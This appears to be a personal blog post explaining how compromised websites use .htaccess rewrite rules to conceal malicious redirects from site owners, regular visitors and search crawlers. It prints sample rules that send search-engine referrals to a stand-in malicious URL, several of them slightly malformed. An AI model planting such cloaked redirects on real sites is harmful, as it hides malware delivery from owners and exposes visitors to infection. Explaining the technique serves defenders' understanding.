Hacked .htaccess: how they work

      No Comments on Hacked .htaccess: how they work

My work consists of helping people with their websites. A direct result of this is that I see lots of sites getting hacked. Lots of them.

In this post i won’t tell you how to prevent this. Also I’m not giving out any lectures. This one just gives you a quick analysis on how a ‘hacked’ site will do his evil doing…

Every now and then a customer complains about his site being hacked. Usually it’s not done very gently, and therefore spotted rather quick. Sometimes how-ever, people’s sites are getting hacked without them knowing it. They usually only find out after complaints of other people that their website tried to infect them with a virus.

How does this work? Rather easy. In this blogpost I will try to show you how some types of infection try to hide and spread themselves. I won’t discuss the details on how to get infected (or not). There are many vectors that can be used to inject your code into a innocent website. You could crack the FTP account, giving you full access. You can exploit weaknesses in the site itself to upload malicious code. Or you can use a virus to get people’s FTP accounts right off their own computer.

As a virus or as a website trying to spread them you want to stay undetected for as long as possible. The longer you can do your work, the more possible victims. The most important people to hide yourself from is the webmaster/owner of the site you are using to direct people to sites that deliver your payload. As long as he hasn’t found out yet, you can keep doing your thing.

The nice part about .htaccess files is not that you can use them to send people somewhere else. The best part (for our purposes) is that you can redirect people based on who they are and how they visit our target site. Our first target to avoid would be the webmaster of the site. Avoiding him will be easy. Just let anyone that visits the site directly (i.e. through a bookmark, or just typing the address) see the original site. This doesn’t require any extra work or code, so the first one is a easy one.

Beside the owner, there are some other people you’ll want to avoid as well. These are the site’s regular visitors. These are, just like the owner, people that will visit the site directly. Most likely they won’t send a referer header with their requests.
Now we have avoided them, its time for our next target. This one is for staying undetected just a little bit longer. As you might know, Google, and other search engines will send visitors to your site. Also they will alert people if they know a site is fraudulent or hosting/spreading malware/viruses. So we want to keep the crawlers as our friends. Lets give them a similar treatment as we gave the website owner:

RewriteCond %{HTTP_USER_AGENT} ^.* (googlebot|yahooseeker|bingbot) [NC,OR]
RewriteRule .* [L]

So what do we have now? We have set up rewrite conditions for crawlers to ensure it will be indexed properly. The webmaster and recurring visitors are left alone.But how do we treat all the people that visit the site? These people will have one thing in common. New visitors will most likely visit the site trough a search engine or other site. This will give them very specific HTTP_REFERER headers we can check for:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|baidu|yahoo|youtube) [NC,OR]
RewriteRule ^(.*)$ http://some.evil.url [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*{wikipedia|web|websuche) [NC,OR]
RewriteRule ^(.*)$ http://some.evil.url [R=301,L]

These are just a few of the headers that can be sent. The final script would have to contain some more headers to check for, but these two sets off rules and conditons should give you an idea on how this works.

Ofcourse, for this to work you would have to have access to the webhosting account of the target site. Uploading these files can be done after you have gained FTP access, or you can use a weakness on the site itselve. Both of those subjects are not what this article is about though, so I’ll leave that one open. :)